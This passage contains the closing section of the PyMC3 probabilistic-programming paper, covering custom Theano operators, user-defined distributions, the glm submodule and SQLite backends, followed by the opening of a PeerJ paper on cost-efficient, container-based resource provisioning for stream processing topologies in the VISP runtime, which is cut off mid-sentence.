PYMC3 FEATURES Arbitrary deterministic variables Due to its reliance on Theano, PyMC3 provides many mathematical functions and operators for transforming random variables into new random variables. However, the library of functions in Theano is not exhaustive, therefore PyMC3 provides functionality for creating arbitrary Theano functions in pure Python, and including these functions in PyMC3 models. This is supported with the as_op function decorator. import theano.tensor as T from theano.compile.ops import as_op @as_op(itypes=[T.lscalar], otypes=[T.lscalar]) def crazy_modulo3(value): if value > 0: return value % 3 else : return (-value + 1) % 3 with Model() as model_deterministic: a = Poisson(’a’, 1) b = crazy_modulo3(a) Theano requires the types of the inputs and outputs of a function to be declared, which are specified for as_op by itypes for inputs and otypes for outputs. An important drawback of this approach is that it is not possible for Theano to inspect these functions in order to compute the gradient required for the Hamiltonian-based samplers. Therefore, it is not possible to use the HMC or NUTS samplers for a model that uses such an operator. However, it is possible to add a gradient if we inherit from theano.Op instead of using as_op. Arbitrary distributions The library of statistical distributions in PyMC3, though large, is not exhaustive, but PyMC allows for the creation of user-defined probability distributions. For simple statistical distributions, the DensityDist function takes as an argument any function that calculates a log-probability log(p(x)). This function may employ other parent random variables in its calculation. Here is an example inspired by a blog post by VanderPlas (2014), where Jeffreys priors are used to specify priors that are invariant to transformation. In the case of simple linear regression, these are: β∝(1+β2)3/2 σ ∝ 1 σ . The logarithms of these functions can be specified as the argument to DensityDist and inserted into the model. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 19/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 import theano.tensor as T from pymc3 import DensityDist, Uniform with Model() as model: alpha = Uniform(’intercept’, -100, 100) # Create custom densities beta = DensityDist(’beta’, lambda value: -1.5 * T.log(1 + value**2), testval=0) eps = DensityDist(’eps’, lambda value: -T.log(T.abs_(value)), testval=1) # Create likelihood like = Normal(’y_est’, mu=alpha + beta * X, sd=eps, observed=Y) For more complex distributions, one can create a subclass of Continuous or Discrete and provide the custom logp function, as required. This is how the built-in distributions in PyMC3 are specified. As an example, fields like psychology and astrophysics have complex likelihood functions for a particular process that may require numerical approximation. In these cases, it is impossible to write the function in terms of predefined Theano operators and we must use a custom Theano operator using as_op or inheriting from theano.Op. Implementing the beta variable above as a Continuous subclass is shown below, along with a sub-function using the as_op decorator, though this is not strictly necessary. from pymc3.distributions import Continuous class Beta(Continuous): def __init__(self, mu, *args, **kwargs): super(Beta, self).__init__(*args, **kwargs) self.mu = mu self.mode = mu def logp(self, value): mu = self.mu return beta_logp(value - mu) @as_op(itypes=[T.dscalar], otypes=[T.dscalar]) def beta_logp(value): return -1.5 * np.log(1 + (value)**2) with Model() as model: beta = Beta(’slope’, mu=0, testval=0) Generalized linear models The generalized linear model (GLM) is a class of flexible models that is widely used to estimate regression relationships between a single outcome variable and one or multiple predictors. Because these models are so common, PyMC3 offers a glm submodule that Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 20/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 allows flexible creation of simple GLMs with an intuitive R-like syntax that is implemented via the patsy module. The glm submodule requires data to be included as a pandas DataFrame. Hence, for our linear regression example: # Convert X and Y to a pandas DataFrame import pandas df = pandas.DataFrame({’x1’: X1, ’x2’: X2, ’y’: Y}) The model can then be very concisely specified in one line of code. from pymc3.glm import glm with Model() as model_glm: glm(’y ~ x1 + x2’, df) The error distribution, if not specified via the family argument, is assumed to be normal. In the case of logistic regression, this can be modified by passing in a Binomial family object. from pymc3.glm.families import Binomial df_logistic = pandas.DataFrame({’x1’: X1, ’x2’: X2, ’y’: Y > 0}) with Model() as model_glm_logistic: glm(’y ~ x1 + x2’, df_logistic, family=Binomial()) Models specified via glm can be sampled using the same sample function as standard PyMC3 models. Backends PyMC3 has support for different ways to store samples from MCMC simulation, called backends. These include storing output in-memory, in text files, or in a SQLite database. By default, an in-memory ndarray is used but for very large models run for a long time, this can exceed the available RAM, and cause failure. Specifying a SQLite backend, for example, as the trace argument to sample will instead result in samples being saved to a database that is initialized automatically by the model. from pymc3.backends import SQLite with model_glm_logistic: backend = SQLite(’logistic_trace.sqlite’) trace = sample(5000, Metropolis(), trace=backend) [-----------------100%-----------------] 5000 of 5000 complete in 2.0 sec A secondary advantage to using an on-disk backend is the portability of model output, as the stored trace can then later (e.g., in another session) be re-loaded using the load function: Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 21/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 from pymc3.backends.sqlite import load with basic_model: trace_loaded = load(’logistic_trace.sqlite’) DISCUSSION Probabilistic programming is an emerging paradigm in statistical learning, of which Bayesian modeling is an important sub-discipline. The signature characteristics of prob- abilistic programming–specifying variables as probability distributions and conditioning variables on other variables and on observations–makes it a powerful tool for building models in a variety of settings, and over a range of model complexity. Accompanying the rise of probabilistic programming has been a burst of innovation in fitting methods for Bayesian models that represent notable improvement over existing MCMC methods. Yet, despite this expansion, there are few software packages available that have kept pace with the method- ological innovation, and still fewer that allow non-expert users to implement models. PyMC3 provides a probabilistic programming platform for quantitative researchers to implement statistical models flexibly and succinctly. A large library of statistical distributions and several pre-defined fitting algorithms allows users to focus on the scientific problem at hand, rather than the implementation details of Bayesian modeling. The choice of Python as a development language, rather than a domain-specific language, means that PyMC3 users are able to work interactively to build models, introspect model objects, and debug or profile their work, using a dynamic, high-level programming language that is easy to learn. The modular, object-oriented design of PyMC3 means that adding new fitting algorithms or other features is straightforward. In addition, PyMC3 comes with several features not found in most other packages, most notably Hamiltonian-based samplers as well as automatical transforms of constrained random variables which is only offered by STAN. Unlike STAN, however, PyMC3 supports discrete variables as well as non-gradient based sampling algorithms like Metropolis-Hastings and Slice sampling. Development of PyMC3 is an ongoing effort and several features are planned for future versions. Most notably, variational inference techniques are often more efficient than MCMC sampling, at the cost of generalizability. More recently, however, black-box variational inference algorithms have been developed, such as automatic differentiation variational inference (ADVI) (Kucukelbir et al., 2015). This algorithm is slated for addition to PyMC3. As an open-source scientific computing toolkit, we encourage researchers developing new fitting algorithms for Bayesian models to provide reference implementations in PyMC3. Since samplers can be written in pure Python code, they can be implemented generally to make them work on arbitrary PyMC3 models, giving authors a larger audience to put their methods into use. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 22/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.55 Competing Interests Thomas V. Wiecki is an employee of Quantopian Inc. John Salvatier is an employee of AI Impacts. Author Contributions • John Salvatier, Thomas V. Wiecki and Christopher Fonnesbeck conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: https://github.com/pymc-devs/uq_chapter. REFERENCES Bastien F, Lamblin P, Pascanu R, Bergstra J, Goodfellow I, Bergeron A, Bouchard N, Warde-Farley D, Bengio Y. 2012. Theano: new features and speed improvements. ArXiv preprint. arXiv:1211.5590. Behnel S, Bradshaw R, Citro C, Dalcin L, Seljebotn DS, Smith K. 2011. Cython: the best of both worlds. Computing in Science & Engineering 13(2):31–39 DOI 10.1109/MCSE.2010.118. Bergstra J, Breuleux O, Bastien F, Lamblin P, Pascanu R, Desjardins G, Turian J, Warde-Farley D, Bengio Y. 2010. Theano: a CPU and GPU math expression compiler. In: Proceedings of the Python for scientific computing conference (SciPy), vol. 4. Austin: SciPy, 3. Available at http://www.iro.umontreal.ca/~lisa/pointeurs/theano_ scipy2010.pdf . Duane S, Kennedy AD, Pendleton BJ, Roweth D. 1987. Hybrid Monte Carlo. Physics Letters B 195(2):216–222 DOI 10.1016/0370-2693(87)91197-X. Goodman N, Mansinghka V, Roy D, Bonawitz K, Tarlow D. 2012. Church: a language for generative models. ArXiv preprint. arXiv:1206.3255. Goodman ND, Stuhlmüller A. 2014. The design and implementation of probabilistic programming languages. Available at http://webppl.org/ . Hoffman MD, Gelman A. 2014. The No-U-Turn Sampler: adaptively setting path lengths in Hamiltonian Monte Carlo. Journal of Machine Learning Research 15:1593–1623. Jarrett R. 1979. A note on the intervals between coal-mining disasters. Biometrika 66(1):191–193 DOI 10.1093/biomet/66.1.191. Kucukelbir A, Ranganath R, Gelman A, Blei D. 2015. Automatic variational inference in Stan. In: Advances in neural information processing systems. Red Hook: Curran & Associates, Inc., 568–576. Kulkarni T, Kohli P, Tenenbaum J, Mansinghka V. 2015. Picture: an imperative probabilistic programming language for scene perception. Available at https:// mrkulk.github.io/www_cvpr15/1999.pdf . Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 23/24 https://peerj.com https://github.com/pymc-devs/uq_chapter http://arXiv.org/abs/1211.5590 http://dx.doi.org/10.1109/MCSE.2010.118 http://dx.doi.org/10.1109/MCSE.2010.118 http://www.iro.umontreal.ca/~lisa/pointeurs/theano_scipy2010.pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano_scipy2010.pdf http://dx.doi.org/10.1016/0370-2693(87)91197-X http://arXiv.org/abs/1206.3255 http://webppl.org/ http://dx.doi.org/10.1093/biomet/66.1.191 https://mrkulk.github.io/www_cvpr15/1999.pdf https://mrkulk.github.io/www_cvpr15/1999.pdf http://dx.doi.org/10.7717/peerj-cs.55 Mansinghka V, Selsam D, Perov Y. 2014. Venture: a higher-order probabilistic program- ming platform with programmable inference. ArXiv preprint. arXiv:1404.0099v1. Minka T, Winn J, Guiver J, Knowles D. 2010. Infer.NET 2.6. Cambridge: Microsoft Research. Pfeffer A. 2014. Figaro: a language for probabalistic programming. Available at http: //www.github.com/p2t2/figaro. Python Software Foundation. 2010. Python language reference. Version 2.7. Available at http://www.python.org . Ritchie D. 2014. Quicksand: a low-level probabilistic programming framework embed- ded in Terra. Available at http://dritchie.github.io/quicksand/ . Spiegelhalter DJ, Thomas A, Best NG, Gilks WR. 1995. Bugs: Bayesian inference using Gibbs sampling, version 0.50. Cambridge: MRC Biostatistics Unit. Stan Development Team. 2015. Stan: a c++ library for probability and sampling. Version 2.5. Available at http://mc-stan.org/ . VanderPlas J. 2014. Frequentism and bayesianism: a python-driven primer. ArXiv preprint. arXiv:1411.5018. Van der Walt S, Colbert SC, Varoquaux G. 2011. The NumPy Array: a structure for efficient numerical computation. Computing in Science & Engineering 13:22–30. Wood F, Van de Meent JW, Mansinghka V. 2014. A new approach to probabilistic programming inference. In: Proceedings of the 17th international conference on artificial intelligence and statistics, 2–46. Salvatier et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.55 24/24 https://peerj.com http://arXiv.org/abs/1404.0099v1 http://www.github.com/p2t2/figaro http://www.github.com/p2t2/figaro http://www.python.org http://dritchie.github.io/quicksand/ http://mc-stan.org/ http://arXiv.org/abs/1411.5018 http://dx.doi.org/10.7717/peerj-cs.55 work_tkn7xe72drcwdmb4dnl5as5iii ---- Cost-efficient enactment of stream processing topologies Cost-efficient enactment of stream processing topologies Christoph Hochreiner1, Michael Vögler2, Stefan Schulte1 and Schahram Dustdar1 1 Distributed Systems Group, TU Wien, Vienna, Austria 2 TU Wien, Vienna, Austria ABSTRACT The continuous increase of unbound streaming data poses several challenges to established data stream processing engines. One of the most important challenges is the cost-efficient enactment of stream processing topologies under changing data volume. These data volume pose different loads to stream processing systems whose resource provisioning needs to be continuously updated at runtime. First approaches already allow for resource provisioning on the level of virtual machines (VMs), but this only allows for coarse resource provisioning strategies. Based on current advances and benefits for containerized software systems, we have designed a cost-efficient resource provisioning approach and integrated it into the runtime of the Vienna ecosystem for elastic stream processing. Our resource provisioning approach aims to maximize the resource usage for VMs obtained from cloud providers. This strategy only releases processing capabilities at the end of the VMs minimal leasing duration instead of releasing them eagerly as soon as possible as it is the case for threshold-based approaches. This strategy allows us to improve the service level agreement compliance by up to 25% and a reduction for the operational cost of up to 36%. Subjects Adaptive and Self-Organizing Systems, Distributed and Parallel Computing Keywords Data stream processing, Cloud computing, Resource elasticity, Resource optimization INTRODUCTION Due to the transition toward a data-centric society, today’s stream processing engines (SPEs) need to deal with a continuous increase of unbound streaming data regarding volume, variety, and velocity (McAfee et al., 2012). Currently, this growth in data is mainly driven by the rise of the internet of things (IoT) (http://www.gartner.com/newsroom/id/3165317). Sensors, which represent a vital part of the IoT, emit a huge volume of streaming data that needs to be processed to provide additional value to users or to trigger actions for IoT devices or other services, e.g., to handle user notifications. Furthermore, many scenarios call for data processing in near real-time, which requires the application of SPEs like System S (Gedik et al., 2008), Apache Storm (Toshniwal et al., 2014), Heron (Kulkarni et al., 2015), or Apache Spark (Zaharia et al., 2010). State-of-the-art SPEs provide the user with an extensive set of APIs to design and enact stream processing topologies. These topologies represent a composition of different stream processing operators, like filters, transformations, or other operations, which are required to process data (Gedik et al., 2008). Although SPEs are highly efficient regarding data processing, they struggle with varying volumes of data over time (Hochreiner et al., 2015). Because most SPEs operate on a fixed How to cite this article Hochreiner et al. (2017), Cost-efficient enactment of stream processing topologies. PeerJ Comput. Sci. 3:e141; DOI 10.7717/peerj-cs.141 Submitted 15 June 2017 Accepted 13 November 2017 Published 11 December 2017 Corresponding author Christoph Hochreiner, c.hochreiner@infosys.tuwien.ac.at Academic editor Daniele D’Agostino Additional Information and Declarations can be found on page 33 DOI 10.7717/peerj-cs.141 Copyright 2017 Hochreiner et al. Distributed under Creative Commons CC-BY 4.0 http://www.gartner.com/newsroom/id/3165317 http://dx.doi.org/10.7717/peerj-cs.141 mailto:c.�hochreiner@�infosys.�tuwien.�ac.�at https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.141 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ amount of computational resources, e.g., on clusters, they cannot adapt to changes of the data volume at runtime (Hochreiner et al., 2016a). One solution for this issue is the over- provisioning of computational resources so that the SPE can process any amount of incoming data while complying with given service level agreements (SLAs). While this approach ensures a high level of SLA compliance, it is not cost-efficient because the provisioned computational resources are not used most of the time. The more economically feasible approach to this challenge is under-provisioning, where an SPE is equipped with computational resources to cover most of the incoming data scenarios. However, in the case of under-provisioning, the SPE may cover most scenarios, but it may also violate SLAs in some high load scenarios, due to a delay in the data processing. Based on the Cloud Computing paradigm (Armbrust et al., 2010), a more promising provisioning approach, namely elastic provisioning for stream processing systems, emerged in recent years (Satzger et al., 2011; Gedik et al., 2014; Heinze et al., 2015; Lohrmann, Janacik & Kao, 2015; Xu, Peng & Gupta, 2016). This approach allows the SPE to lease computational resources on-demand whenever they are required. Resources can be released again as soon as they are not needed anymore. This approach allows for the cost-efficient enactment of stream processing topologies while maintaining high SLA compliance (Hochreiner et al., 2016a). Up to now, most elastic provisioning approaches only consider virtual machines (VMs) as the smallest entity for leasing and releasing of computational resources. This approach is perfect applicable for private clouds, where the only objective of resource provisioning algorithms is resource-efficiency, and there is no need to consider any billing aspects or billing time units (BTUs). A BTU defines the minimum leasing duration for computational resources, e.g., VMs, and often amounts to 1 h like on Amazon EC2 (https://aws.amazon.com/ec2/pricing/). The concept of the BTU means that the user has to pay for each started hour, regardless of how many minutes the VM is used. Because of the BTU, the repeated leasing and releasing of VMs may result in even higher cost than an over-provisioning scenario (Genaud & Gossa, 2011), because releasing a VM before the end of the BTU results in a waste of resources. To address this shortcoming, this paper considers an additional resource abstraction layer on top of the VMs, to allow for more fine-grained elastic provisioning strategies with the goal to ensure the most cost-efficient usage of the leased resources while respecting given SLAs. This additional layer is realized by applying the recent trend toward containerized software components, i.e., containerized stream processing operators. The containerization provides several advantages regarding deployment and management of computational resources. Besides the smaller granularity compared to VMs, containerized stream processing operators also allow for a faster adaption of the stream processing topology on already running computational resources. An additional layer of containers also enables reusing already paid computational resources, i.e., resources can be utilized for the full BTU. Today, frameworks like Apache Mesos (Hindman et al., 2011), Apache YARN (Vavilapalli et al., 2013), Kubenetes (https://kubernetes.io) or Docker Swarm (https://docs.docker.com/swarm/) provide the functionality to deploy containerized applications on computational resources. These frameworks rely on simple principles like random deployment, bin-packing, or equal distribution to deploy Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 2/36 https://aws.amazon.com/ec2/pricing/ https://kubernetes.io https://docs.docker.com/swarm/ http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ containers across multiple hosts. Although these approaches work well for most use cases, the resource usage efficiency for the underlying VMs in terms of their BTUs can be improved as we are going to show in our work. In this paper, we propose an elastic resource provisioning approach which ensures an SLA-compliant enactment of stream processing topologies while maximizing the resource usage of computational resources and thus minimizing the operational cost, i.e., cost for computational resources and penalty cost for delayed processing, for the topology enactment. The results of our evaluation show that our approach achieves a cost reduction of about 12% compared to already existing approaches while maintaining the same level of quality of service. The main contributions of our work are the following: � We propose a BTU-based resource provisioning approach, which only performs scaling activities when they are required to cope with the data volumes or when a downscaling operation can achieve a resource cost reduction while maintaining the same SLA compliance level. � We extend the VISP Runtime (Hochreiner et al., 2016b) to support our BTU-based resource provisioning approach. The VISP Runtime is designed to serve as a test environment for resource provisioning mechanism and for this work we have not only implemented the BTU-based approach, but also refined the monitoring infrastructure to collect the information required for our approach. � We implement a real-world scenario from the manufacturing domain and evaluate the BTU-based approach against a threshold-based baseline. The remainder of this paper is structured as follows: first, we provide a motivational scenario, discuss the system architecture and present the derived requirements in “Motivation.” Based on these requirements we then provide the problem definition for the optimization problem in “Problem Definition,” which leads to our optimization approach presented in “Optimization Approach.” In “Evaluation,” we describe our evaluation setup and in “Results and Discussion,” we present the evaluation results and their discussion. “Related Work” provides an overview on the related work, before we conclude the paper in “Conclusion.” MOTIVATION Motivational scenario In the following paragraphs, we describe a data stream processing scenario from our EU H2020 project Cloud-based Rapid Elastic Manufacturing (CREMA) (Schulte et al., 2014). Figure 1 shows a stream processing topology, which is composed of nine different stream processing operator types (O1–O9) that process the data originating from three different sources (S1, S2, S3). Each of the operator types performs a dedicated operation to transform the raw data from manufacturing machines into value-added and human- readable information. The information from the data sources is used to monitor three different aspects, like the availability of the manufacturing machines or the machine temperature to avoid overheating of the machines and assess their overall equipment Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 3/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ effectiveness (OEE). In this scenario, we have two different types of data sources. The first type of data source are sensors, i.e., S1 and S3, which emit machine-readable data and can be directly accessed via an API. The second type of data, e.g., S2, is a video feed, which scans a display of the manufacturing machines because some information is not directly accessible via an API. This information needs additional preprocessing to transform the data into machine-readable data. The Availability Sensor (S1) emits the current status, i.e., available, defect or planned downtime, of the manufacturing machine every 2 s. This information is then filtered by the Filter Availability (O2) operator, which generates warnings for each new downtime incident of a specific manufacturing machine. The warning is then forwarded to the Inform User (O8) operator, which informs a human supervisor of the machines. The second data source is the Production Data (S2), which is obtained by a video stream, i.e., an image taken every 10 s. This image contains different production-related information, such as the amount of produced goods and needs further processing, e.g., by optical character recognition (OCR), to extract machine-readable information. The Parse and Distribute Data (O1) operator distributes the information to the three operators O3, O4, O5 that calculate the different components of the OEE value. These individual components are then united by the Calculate OEE (O7) operator and afterwards forwarded to the Generate Report (O9) operator, which generates a PDF-report every minute. This report aggregates the information of all monitored machines and is forwarded once every minute to the Inform User (O8) operator. The Temperature Sensor (S3) emits the temperature twice every second. This information is processed by the Monitor Temperature (O6) operator, which triggers a warning whenever the temperature exceeds a predefined threshold. This warning is then also forwarded to the Inform User (O8) operator to inform the human supervisor. Due to the different levels of complexity of the operations, each of these operator types has different computational resource requirements, e.g., CPU or memory. Some of the operators, e.g., the Parse and Distribute Data operator type, require more resources Manufacturing Machine Manufacturing Machine Manufacturing Machine Calculate Performance (O3) Calculate Availability (O4) Calculate Quality (O5) Monitor Temperature (O6) Calculate OEE (O7) Filter Availability (O2) Generate Report (O9)Inform User (O8) Parse and Distribute Data (O1) Availability Sensor (S1) Produc�on Data (S2) Temperature Sensor (S3) Figure 1 Stream processing topology from the manufacturing domain. Full-size DOI: 10.7717/peerj-cs.141/fig-1 Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 4/36 http://dx.doi.org/10.7717/peerj-cs.141/fig-1 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ for processing one data item than others, like the Filter Availability. Besides the computational requirements, each operator type is also assigned with specific service level objectives (SLOs), like the maximal processing duration of one single data item. These SLOs are monitored, and whenever one operator type threatens to violate the imposed SLA, the system needs to provide more computational resources for data processing. System architecture To enact the stream processing topology from the motivational scenario, it is required to instantiate it on an SPE. For our work at hand, we are extending the VISP ecosystem, which was introduced in our previous work (Hochreiner et al., 2016b). VISP represents an SPE, which is capable of provisioning computational resources on demand to adapt to the incoming load from data sources. VISP is composed of different components to cover the whole lifecycle of the stream processing topology enactment. Figure 2 shows a subset of these components, which are relevant for enacting the topology. For a detailed description of the components, please refer to our previous work (Hochreiner et al., 2016b) or to the online documentation of the VISP Ecosystem (https://visp-streaming. github.io), which is available under the Apache 2.0 License. The primary task of the SPE, i.e., VISP Runtime, is to process data originating from data sources (on the left side of the figure) to obtain value-added data for users (on the right side of the figure) based on the Topology Definition. The actual data processing is conducted by Operators, which are deployed on computational resources, e.g., VMs, provided by an infrastructure as a service environment. Each operator type is instantiated from dedicated operator images hosted on an external operator repository. To instantiate a specific operator instance on any host for the first time, the operator image needs to be downloaded from the registry, which takes a certain amount of time, depending on the size of the operator image. After the first instantiation of the operator VISP Run�me Topology Definition Computa�onal Resources Virtual Machine 1 Operator 1 Operator N Virtual Machine N Operator X Operator Z Messaging Infrastructure Resource Optimization Resource Provisioning Resource Monitor Data Source N Data Source 1 R R Operator Image N Operator Image 1 Operator Repository Shared State Figure 2 VISP stream architecture. Full-size DOI: 10.7717/peerj-cs.141/fig-2 Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 5/36 https://visp-streaming.github.io https://visp-streaming.github.io http://dx.doi.org/10.7717/peerj-cs.141/fig-2 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ type, the operator image is cached locally on the host to speed up the instantiation of future instances. Each operator type is also assigned with individual SLAs whereas each SLA consists of different SLOs. The first SLO is the maximum processing duration for one data item and ensures the near real-time processing capabilities of the stream processing topology. The second SLO describes the minimal resource requirements that are needed to instantiate the stream processing operator. These requirements are represented by the minimum amount of memory, i.e., Memory in MegaByte (MB), and the number of CPU shares. For the enactment of a stream processing topology, each Operator from the topology is represented by at least one, but up to arbitrarily many Operators. These Operators fetch the data from the Messaging Infrastructure according to the Topology Definition, process it and push it back for further processing steps. The remaining components of the VISP Runtime are in charge of monitoring the load on the Messaging Infrastructure as well as on the Operators. This monitoring information is then used by the Resource Optimization component to evaluate whether operator types need to be replicated to deal with the incoming load. Finally, the Resource Provisioning component is in charge of deploying and un-deploying Operators on computational resources. Enactment scenario During the enactment, the stream processing operators need to deal with streaming data from a varying amount of manufacturing machines, as shown in Fig. 3 at the bottom. This varying data volume requires the SPE to adapt its processing capabilities, i.e., the number of operator instances for specific operator types, which are hosted on an arbitrary amount of hosts, e.g., H1–H4 in Fig. 3, on demand to comply with the SLAs. Nevertheless, the SPE aims at minimizing the needed number of hosts, since each host amounts for additional cost, by using an optimal deployment. The enactment of our motivational scenario is partitioned into different stages, with a varying number of running manufacturing machines in each stage. At the beginning of stage 1, each operator is deployed once across the two hosts H1–H2. Since the volume H1 Stage 1 Arrival of Streaming Data over Time A m ou nt o f M an uf ac tu ri ng M ac hi ne s O2 H2 O1 O3 O4 O5 O6 O7 O8 O9 Stage 2 H3H1 O2 H2 O1 O3 O4 O5 O6 O7 O8 O9 O1 O6 O2 Stage 3 H3H1 O2 H2 O1 O3 O4 O5 O9 H4 Stage 4 H3H1 H2 O9 O3 O4 H4 O5 O6 O7 O8 O9 O2 O1 O6 O1 O3 O4 O5 O6 O7 O8 O9 O2 O1 O6 O1 O2 Figure 3 Deployment stages. Full-size DOI: 10.7717/peerj-cs.141/fig-3 Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 6/36 http://dx.doi.org/10.7717/peerj-cs.141/fig-3 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ of streaming data increases after some time, the SPE needs to adapt the processing capabilities by deploying replicas of the operator types O1, O2 and O6 in stage 2. These operator instances are hosted on a new host H3 because the two already existing hosts cannot cope with the additional operator instances. Because the amount of data increases again in stage 3, the SPE needs to replicate further operators to comply with the SLAs. Although the second replication of the operator type O1 is feasible on the currently available resources, the SPE is required to lease a new host for the additional operator instances of types O3, O4, O5, and O9. At the end of stage 3, H1–H2 meet the end of their BTU. Therefore, the SPE evaluates whether some of the replicated operators can be removed again without violating the SLAs. Because the amount of data is decreasing after stage 3, the system can remove (O1, O3, O4, and O5) or migrate (O2) some of the operator instances to other hosts. This leads to the situation that no operator instances are running on host H1 at the end of its BTU and the SPE can accordingly release H1, while host H2 needs to be leased for another BTU. Requirements Based on our motivational scenario, we have identified several requirements which need to be addressed by the optimization approach. SLA compliance The first requirement is SLA compliance in terms of maximum processing duration, for data that is processed by the stream processing topology. This compliance is the overall goal that needs to be met, regardless of the actual incoming data rate. Cost efficiency The second requirement is the cost efficiency for the enactment. This requirement asks for a high system usage of leased resources and an efficient usage of cloud resources, especially regarding their BTU. Optimization efficiency The optimization efficiency requirement can be split into two different aspects. The first aspect is the solution of the optimization problem presented in “Problem Definition.” Because this optimization problem is NP-hard (see Optimization Problem), it is required to devise heuristics to achieve a time- and resource-efficient optimization approach. The second aspect is that the optimization needs to minimize the number of reconfigurations, e.g., scaling operations, for the stream processing topology because each reconfiguration activity has a negative performance impact on the data processing capabilities. PROBLEM DEFINITION System model and notation The system model is used to describe the system state of the individual operator types that form the stream processing topology as well as the used computational resources. The Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 7/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ individual operator types are represented by O ¼ f1; . . . ; o#g, where o ∈ O represents a specific operator type. Each operator type o is assigned with minimal resource requirements ocpu and omemory which need to be met to instantiate an operator on any host. At runtime, each operator type is represented by at least one, but up to arbitrary many operator instances, which are described by the set I ¼ f1; . . . ; i#g, whereas each itype is assigned to a particular operator type o ∈ O. This set of operator instances I is running on arbitrarily many hosts that are represented by the set H ¼ f1; . . . ; h#g, whereas each host hosts a subset of I. Each of these hosts is furthermore assigned with a set of attributes. The attributes hcpu and hmemory represent the overall computational resources of the host, and the attributes hcpu� and hmemory� represent the remaining computational resources at runtime. The attributes hcpu� and hmemory� are decreased for every operator instance i on the specific host h and can be used to determine if it is possible to deploy an additional operator instance on this particular host h. The attribute hcost represents the cost for the host, which needs to be paid for each BTU. The attribute hBTU� represents the remaining, already paid, BTU time. To represent the different startup times between cached and non-cached operator images, each host furthermore denotes a set of images himg. This set contains all operator images o ∈ O, which are cached on this particular host. Each operator type is assigned a specific image, whose identifier is identical to the name of the operator type. Besides the fundamental operator type attributes for instantiating operators, there is also a set of attributes, which is used to ensure the SLA compliance for data processing. Each operator type is assigned with an estimated data processing duration oslo, that represents the time to process one data item and pass it on to the following operator type according to the stream processing topology. The oslo value is recorded in an optimal processing scenario, where no data item needs to be queued for data processing. Since the SLO oslo only presents the expected processing duration, we also denote the actual processing duration for each operator od and the amount of data items oqueue that are queued for a particular operator type for processing. In addition to the current od, the system model also considers previous processing durations. Here we consider for each operator type o, the last N processing durations od denoted as od1 to odN, whereas each of the values gets updated after a new recording of the od, i.e., od1 obtains the value of od and od2 obtains the value of od1, etc. If the actual processing duration od takes longer than the SLO oslo, penalty cost P accrue to compensate for the violated SLAs each time a violation v ∈ V occurs. Furthermore, we denote two operational attributes for each operator type. The attribute o# represents all current instances, i.e., the sum of all instances of the operator type o, and the attribute os represents all already executed scaling operations, both upscaling and downscaling, for a specific operator type. Last, we also denote the current incoming amount of data items as DR. Optimization problem Based on the identified requirements in “Requirements,” we can formulate an optimization problem as shown in Eq. (1). The goal of this optimization problem is Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 8/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ to minimize the cost for the topology enactment while maintaining given SLOs. This equation is composed of four different terms, which are designed to cover the different requirements. The first term represents the cost for all currently leased hosts by multiplying the number of all currently leased hosts with the cost for a single host. The second and third term are designed to maximize the resource usage on all currently leased hosts regarding the CPU and memory. The last term ensures the SLA compliance of the deployment, due to the penalty cost, which accrue for each SLO violation. Although the solution of this optimization problem provides an optimal solution for a cost-efficient deployment, it is not feasible to rely on the solution of this problem due to its complexity. To define the complex nature of this problem, we are going to provide a reduction to an unbounded knapsack problem (Andonov, Poirriez & Rajopadhye, 2000), which is known to be NP-hard. Min h# � hcost þ P h2H hcpu � P i2I\itype¼o ocpuP h2H hcpu þ P h2H hmemory � P i2I\itype¼o hmemoryP h2H hmemory þ X v2V v � P (1) Definition of knapsack problem The unbounded knapsack problem assumes a knapsack, whose weight capacity is bounded by a maximum capacity of C and a set of artifacts A. Each of these artifacts a is assigned with a specific weight aw > 0 as well as a specific value av > 0 and can be placed an arbitrary amount of times in the knapsack. The goal is to find a set A1 of items, whereP a2A aw � C and P a2A av is maximized. NP-hardness of the optimization problem For our reduction, we assume a specific instance of our optimization problem. For this specific instance, we assume that the number of hosts is fixed and that each of the operators has the same memory requirements omemory. Furthermore, we define the value of a specific operator by the amount of data items oqueue that are queued for a specific operator type, i.e., the more items need to be processed, the higher is the value for instantiating a specific operator. Based on this specific instance of the optimization problem, we can build an instance of the unbounded knapsack problem, where the maximum capacity C is defined by the maximum amount of CPU resources on all available hosts P h2H hcpu, the weight aw of the artifacts a is defined by the CPU 